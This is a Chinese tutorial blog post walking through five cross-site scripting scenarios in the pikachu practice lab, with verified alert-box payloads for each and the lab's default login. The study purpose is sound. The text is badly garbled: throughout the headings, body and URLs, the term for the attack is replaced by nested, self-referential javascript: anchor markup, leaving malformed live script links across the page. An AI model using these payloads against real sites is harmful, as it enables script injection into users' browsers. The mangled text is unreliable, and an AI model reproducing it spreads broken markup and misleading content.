Web漏洞-XSS实验-pikachu靶场5个场景(二)
★★实战前置声明★★文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、前言
上一篇《Web漏洞-XSS理论和靶场小试牛刀(一)》已经介绍了XSS一些理论知识点,本文主要是分享pikachu靶场XSS攻击的3个类型5个场景:反射型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>(post)、存储型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>-x和<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>之盲打。攻击思路是怎么样的,为什么使用这个poc。
2、反射型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>(post)
2.0、该验证需登录
注意:该验证需要先用户登录完才可操作,账户名/密码:admin/123456,可以右击上方提示。
2.1、正常操作
输入'?"&/6666,界面显示如下:
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222336322-1220070749.png
2.2、查看源码
按F2看源码,发现输入的内容直接回显,且放在p标签内,输入框也没有长度限制。
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222349821-2145227651.png
2.3、确定攻击poc
攻击poc选择就比较多,以下是我验证通过的poc
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
<a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222404398-1180212185.png
3、存储型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>
3.1、正常操作
输入'?"&/6666,界面显示如下:
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222415200-1716383136.png
3.2、查看源码
按F2看源码,发现输入的内容直接回显,且放在p标签内,输入框也没有长度限制。
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222426157-1016106562.png
3.3、确定攻击poc
攻击poc选择就比较多,以下是验证通过的poc
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
<a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222437151-406487433.png
4、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>
4.1、正常操作
输入'?"&/6666,发现显示有点奇怪,调整成输入123,界面显示如下:
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222453248-1149529143.png
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222500124-1664301778.png
4.2、查看源码
按F2看源码,发现输入的内容,是填充在a标签的href内,没有编码,href是用双引号的。
确定是否有编码是通过输入'?"&/6666,按F12看源码的。
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222513594-702428898.png
4.3、确定攻击poc
攻击poc就可以采用a标签弹窗方式的语句了
<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>注意:只取href里面的部分,且alert()的内容需要用双引号,或者用数字的方式。
验证成功的poc
javascript:alert("test")
javascript:alert(1)https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222526967-892416152.png
5、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>-x
5.1、正常操作
输入'?"&/6666,发现显示有点奇怪,调整成输入123,界面显示如下:
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222542309-606068177.png
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222547864-792434128.png
5.2、查看源码
按F2看源码,发现输入的内容,是填充在a标签的href内,没有编码,href是用双引号的。
图示包含在5.1里面了,不再单独截图
5.3、确定攻击poc
攻击poc就可以采用a标签弹窗方式的语句了
<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>注意:只取href里面的部分,且alert()的内容需要用双引号,或者用数字的方式。
验证成功的poc
javascript:alert("test")
javascript:alert(1)https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222605405-1358332594.png
6、<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>之盲打
6.1、正常操作
一次输入正常的内容,一次输入'?"&/6666,按F12在当前页都没发现提交后相关信息,提交页面的两个输入框长度没有限制。
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222625611-1700261509.png
点右上方“点一下提示~”,
访问:http://127.0.0.1/pikachu/vul/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>blind/admin_login.php输入pikachu的默认用户名和密码:admin / 123456跳转到页面:http://127.0.0.1/pikachu/vul/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>blind/admin.php是刚才提交的结果列表页界面显示如下:
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222638674-1131943220.png
6.2、查看源码
按F2看源码,发现输入的内容,是列表展示是在表格td标签内,没有编码。
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222652508-1397512554.png
6.3、确定攻击poc
攻击poc选择就比较多,以下是验证通过的poc
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
<a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222705048-991534965.png
https://img2023.cnblogs.com/blog/338385/202311/338385-20231112222711047-391778291.png
7、资料获取
靶场环境搭建请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]